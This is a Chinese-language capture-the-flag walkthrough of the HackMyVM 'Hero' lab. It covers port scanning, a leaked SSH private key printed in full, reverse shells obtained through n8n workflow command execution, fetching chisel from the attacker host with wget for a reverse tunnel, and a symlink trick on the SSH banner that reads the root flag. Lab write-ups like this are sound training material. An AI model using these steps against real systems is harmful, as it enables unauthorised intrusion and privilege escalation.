HackMyVM-Hero-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.178  08:00:27:76:df:33       (Unknown)
192.168.60.254  00:50:56:e4:ae:23       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.937 seconds (132.16 hosts/sec). 4 responded
❯ export ip=192.168.60.178
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.178:80
Open 192.168.60.178:5678
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 20:55 CST
Initiating ARP Ping Scan at 20:55
Scanning 192.168.60.178 [1 port]
Completed ARP Ping Scan at 20:55, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:55
Completed Parallel DNS resolution of 1 host. at 20:55, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:55
Scanning 192.168.60.178 [2 ports]
Discovered open port 80/tcp on 192.168.60.178
Discovered open port 5678/tcp on 192.168.60.178
Completed SYN Stealth Scan at 20:55, 0.07s elapsed (2 total ports)
Nmap scan report for 192.168.60.178
Host is up, received arp-response (0.0042s latency).
Scanned at 2025-02-08 20:55:05 CST for 0s

PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 64
5678/tcp open  rrac    syn-ack ttl 63
MAC Address: 08:00:27:76:DF:33 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

靶机很反常的没有开放22端口，看一下80和5678端口

❯ whatweb -v $ip
WhatWeb report for http://192.168.60.178
Status    : 200 OK
Title     : <None>
IP        : 192.168.60.178
Country   : RESERVED, ZZ

Summary   : HTTPServer[nginx], nginx

Detected Plugins:
[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        String       : nginx (from server string)

[ nginx ]
        Nginx (Engine-X) is a free, open-source, high-performance
        HTTP server and reverse proxy, as well as an IMAP/POP3
        proxy server.

        Website     : http://nginx.net/

HTTP Headers:
        HTTP/1.1 200 OK
        Server: nginx
        Date: Sat, 08 Feb 2025 12:55:53 GMT
        Content-Type: text/html
        Content-Length: 399
        Last-Modified: Thu, 06 Feb 2025 10:12:53 GMT
        Connection: close
        ETag: "67a48b25-18f"
        Accept-Ranges: bytes

❯ whatweb -v $ip:5678
WhatWeb report for http://192.168.60.178:5678
Status    : 200 OK
Title     : n8n.io - Workflow Automation
IP        : 192.168.60.178
Country   : RESERVED, ZZ

Summary   : HTML5, Script[module,text/javascript], UncommonHeaders[cross-origin-opener-policy,cross-origin-resource-policy,origin-agent-cluster,referrer-policy,x-content-type-options,x-permitted-cross-domain-policies], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge], X-XSS-Protection[0]

Detected Plugins:
[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.

        String       : module,text/javascript

[ UncommonHeaders ]
        Uncommon HTTP server headers. The blacklist includes all
        the standard headers and many non standard but common ones.
        Interesting but fairly common headers should have their own
        plugins, eg. x-powered-by, server and x-aspnet-version.
        Info about headers can be found at www.http-stats.com

        String       : cross-origin-opener-policy,cross-origin-resource-policy,origin-agent-cluster,referrer-policy,x-content-type-options,x-permitted-cross-domain-policies (from headers)

[ X-Frame-Options ]
        This plugin retrieves the X-Frame-Options value from the
        HTTP header. - More Info:
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : SAMEORIGIN

[ X-UA-Compatible ]
        This plugin retrieves the X-UA-Compatible value from the
        HTTP header and meta http-equiv tag. - More Info:
        http://msdn.microsoft.com/en-us/library/cc817574.aspx

        String       : IE=edge

[ X-XSS-Protection ]
        This plugin retrieves the X-XSS-Protection value from the
        HTTP header. - More Info:
        http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
        aspx

        String       : 0

HTTP Headers:
        HTTP/1.1 200 OK
        Cache-Control: no-cache, no-store, must-revalidate
        Cross-Origin-Opener-Policy: same-origin
        Cross-Origin-Resource-Policy: same-origin
        Origin-Agent-Cluster: ?1
        Referrer-Policy: no-referrer
        X-Content-Type-Options: nosniff
        X-Frame-Options: SAMEORIGIN
        X-Permitted-Cross-Domain-Policies: none
        X-XSS-Protection: 0
        Accept-Ranges: bytes
        Last-Modified: Sat, 08 Feb 2025 12:54:51 GMT
        ETag: W/"7b7-194e5a08b43"
        Content-Type: text/html; charset=UTF-8
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Date: Sat, 08 Feb 2025 12:56:12 GMT
        Connection: close
        Transfer-Encoding: chunked

私钥泄露

curl一下80端口有个私钥文件

可以通过私钥文件提取公钥拿到用户名或者查看密钥的注释

得到shawa@hero

❯ curl $ip
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwgAAAJAczctSHM3L
UgAAAAtzc2gtZWQyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwg
AAAEAnYotUqBFoopjEVz9Sa9viQ8AhNVTx0K19TC7YQyfwAqiYY31x+ZMvvHfmGWC7ZE75
BbdbAKYEtIX75k6CL27CAAAACnNoYXdhQGhlcm8BAgM=
-----END OPENSSH PRIVATE KEY-----
❯ vim id_rsa
❯ chmod 600 id_rsa
❯ ssh-keygen -y -f id_rsa
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKiYY31x+ZMvvHfmGWC7ZE75BbdbAKYEtIX75k6CL27C shawa@hero
❯ ssh-keygen -c -f id_rsa
Old comment: shawa@hero
New comment:

n8n利用

5678端口下是个n8n，查了一下是个开源的自动化工具

大概可以执行命令然后将结果返回到其他工作流

很显然可以执行系统命令，创建一个手动的测试工作流

可以正常执行命令，直接弹一个shell

用户提权

但是我发现用pwncat-cs没法正常拿到shell，环境没有可用的pty，我怀疑这个服务应该开在docker中

正常使用nc监听吧

没补全有点难受，不过不影响

看一下ip你可以看到是在172网段的，确实是在docker中

❯ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.178] 39603
id
uid=1000(node) gid=1000(node) groups=1000(node)
ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3505 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2396 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:1050967 (1.0 MiB)  TX bytes:5971826 (5.6 MiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

利用上面拿到的私钥登录172.17.0.1主机

我就不在shell中执行了，n8n中有ssh对应的相关操作

可以正常执行

反弹一个shell，收集一些信息

拿到user了

❯ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.178] 36351
id
uid=1000(shawa) gid=1000(shawa) groups=1000(shawa)
cd ~
ls
user.txt
ls -a
.
..
.ash_history
.ssh
user.txt
cat us
cat user.txt
HMVOHIMNOTREAL

发现用户家目录有ssh公私钥对

通过busybox查一下本机开放的端口

172.17.0.1开放22端口，我们就是通过这个端口反弹端口上来的

busybox netstat -lutnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 172.17.0.1:22           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5678            0.0.0.0:*               LISTEN      -
tcp        0      0 :::80                   :::*                    LISTEN      -
tcp        0      0 :::5678                 :::*                    LISTEN      -

Root提权

但是这个shell太难受了，想办法端口转发一下

利用ssh登陆上去

发现在opt下有个banner.txt

wget 192.168.60.100/chisel
chmod +x chisel
./chisel client 192.168.60.100:2333 R:2222:172.17.0.1:22
---------------------分隔----------------------------
❯ ./chisel server --reverse -p 2333
2025/02/08 21:17:51 server: Reverse tunnelling enabled
2025/02/08 21:17:51 server: Fingerprint 4mMcP1IoyCEVfK1HbOIKexTHnXhzLp30RieJdipdJeg=
2025/02/08 22:14:52 server: session#2: tun: proxy#R:2222=>172.17.0.1:22: Listening
❯ ssh [email protected] -p 2222 -i id_rsa
The authenticity of host '[127.0.0.1]:2222 ([127.0.0.1]:2222)' can't be established.
ED25519 key fingerprint is SHA256:EBZrmf2l6+BtffXHAEtSx6Suq5Wf09yzZlVqbQaGOVM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[127.0.0.1]:2222' (ED25519) to the list of known hosts.
shawa was here.
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

hero:~$ id
uid=1000(shawa) gid=1000(shawa) groups=1000(shawa)
hero:~$ cd /opt
hero:/opt$ ls
banner.txt  containerd
hero:/opt$ cat banner.txt
shawa was here.

你仔细观察，在ssh登录成功后会显示这个shawa was here.

hero:/opt$ cat /etc/ssh/sshd_config
……………………省略………………

# no default banner path
Banner /opt/banner.txt

……………………省略……………………

直接给banner.txt创建一个软连接到root/root.txt

hero:/opt$ rm banner.txt
hero:/opt$ ln -s /root/root.txt banner.txt
hero:/opt$ ls
banner.txt  containerd
hero:/opt$ ls -al
total 12
drw-rw-rwx    3 root     root          4096 Feb  8 14:25 .
drwxr-xr-x   21 root     root          4096 Feb  6 10:03 ..
lrwxrwxrwx    1 shawa    shawa           14 Feb  8 14:25 banner.txt -> /root/root.txt
drwx--x--x    4 root     root          4096 Feb  6 10:14 containerd
❯ ssh [email protected] -p 2222 -i id_rsa
HMVNOTINPRODLOL
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

这样就拿到flag了，虽然说没拿到root shell，拿完flag就跑路🏃‍♂️